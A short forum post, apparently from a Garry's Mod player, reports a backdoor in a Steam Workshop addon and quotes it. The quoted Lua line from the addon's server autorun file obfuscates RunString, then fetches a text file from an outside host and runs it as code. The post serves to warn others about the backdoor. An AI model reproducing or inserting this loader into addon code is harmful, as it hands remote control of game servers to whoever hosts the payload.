So yeah… Found a backdoor in a Workshop addon.
This is the workshop addon - http://steamcommunity.com/sharedfiles/filedetails/?id=584629340
The guy also has some others. I haven’t checked them out myself, but this is what he put in his lua/autorun/server/resource.lua in this addon.
local rstr=_G["Ru".."nStr".."ing"]; RSTR=RSTR||rstr; local htf=http.Fetch; HTF=HTF||htf; timer.Simple(5, function() htf("http://puu.sh/gtnOX/57dc004931.txt",function(c)rstr(c)end); end);
Not sure the best was to handle this kind of situation but hopefully someone who can do something about it will see this.